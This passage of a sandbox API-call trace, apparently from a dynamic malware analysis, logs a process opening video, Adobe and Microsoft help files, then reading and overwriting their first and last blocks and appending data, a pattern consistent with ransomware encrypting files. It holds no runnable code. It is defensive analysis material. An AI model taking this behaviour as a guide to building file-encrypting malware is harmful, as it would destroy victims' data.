lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x41d6 [0180.742] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.742] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.742] WriteFile (in: hFile=0x208, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.742] CloseHandle (hObject=0x208) returned 1 [0180.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\xllZpCi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\xllzpci.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.743] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.743] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x494e [0180.743] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.743] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.743] ReleaseMutex (hMutex=0x168) returned 1 [0180.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xllZpCi.swf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xllZpCi.swf", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xllZpCi.swf", lpUsedDefaultChar=0x0) returned 11 [0180.743] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.744] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x394e [0180.744] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.745] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x394e [0180.745] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.745] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.745] WriteFile (in: hFile=0x208, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.745] CloseHandle (hObject=0x208) returned 1 [0180.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\RFGULbCUMp.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\rfgulbcump.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.746] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.746] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfe14 [0180.746] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.746] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.746] ReleaseMutex (hMutex=0x168) returned 1 [0180.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RFGULbCUMp.flv", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RFGULbCUMp.flv", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RFGULbCUMp.flv", lpUsedDefaultChar=0x0) returned 14 [0180.747] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.748] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xee14 [0180.748] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.748] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xee14 [0180.748] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.749] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.749] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.749] CloseHandle (hObject=0x208) returned 1 [0180.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\jxvud.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\jxvud.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.750] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.750] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x48b3 [0180.750] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.750] ReleaseMutex (hMutex=0x168) returned 1 [0180.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jxvud.avi", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0180.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jxvud.avi", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jxvud.avi", lpUsedDefaultChar=0x0) returned 9 [0180.750] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.751] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38b3 [0180.751] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.751] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38b3 [0180.752] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.752] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.752] WriteFile (in: hFile=0x208, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.752] CloseHandle (hObject=0x208) returned 1 [0180.752] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.752] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.752] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3dd88 [0180.752] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.753] ReleaseMutex (hMutex=0x168) returned 1 [0180.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrSecUpd10111.msp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0180.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrSecUpd10111.msp", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrSecUpd10111.msp", lpUsedDefaultChar=0x0) returned 22 [0180.753] ReadFile (in: hFile=0x208, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0180.753] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3cd88 [0180.753] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.753] CloseHandle (hObject=0x208) returned 1 [0180.753] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.754] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.754] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd5310 [0180.754] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.754] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.754] ReleaseMutex (hMutex=0x168) returned 1 [0180.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0180.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cchWideChar=46, lpMultiByteStr=0x1fb3e9c, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpUsedDefaultChar=0x0) returned 46 [0180.755] ReadFile (in: hFile=0x208, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0180.771] ReadFile (in: hFile=0x208, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.794] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd4310 [0180.794] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.859] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd4310 [0180.859] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.860] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.860] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.860] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.861] CloseHandle (hObject=0x208) returned 1 [0180.861] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0180.922] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.922] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3a7c [0180.922] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.922] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.922] ReleaseMutex (hMutex=0x168) returned 1 [0180.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pending.GRL", lpUsedDefaultChar=0x0) returned 11 [0180.922] ReadFile (in: hFile=0x204, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0181.045] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2a7c [0181.046] ReadFile (in: hFile=0x204, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0181.050] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2a7c [0181.050] WriteFile (in: hFile=0x204, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0181.051] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0181.051] WriteFile (in: hFile=0x204, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0181.051] CloseHandle (hObject=0x204) returned 1 [0181.052] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.052] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.052] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e6 [0181.052] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.053] ReleaseMutex (hMutex=0x168) returned 1 [0181.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0181.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0181.053] ReadFile (in: hFile=0x204, lpBuffer=0x28992f8, nNumberOfBytesToRead=0x6e6, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28992f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x6e6, lpOverlapped=0x0) returned 1 [0181.053] CloseHandle (hObject=0x204) returned 1 [0181.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.054] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.054] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6ce [0181.054] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.054] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.054] ReleaseMutex (hMutex=0x168) returned 1 [0181.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0181.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0181.055] ReadFile (in: hFile=0x204, lpBuffer=0x28992f8, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28992f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x6ce, lpOverlapped=0x0) returned 1 [0181.055] CloseHandle (hObject=0x204) returned 1 [0181.055] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.055] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.055] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6f8 [0181.056] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.056] WaitForSingleObject 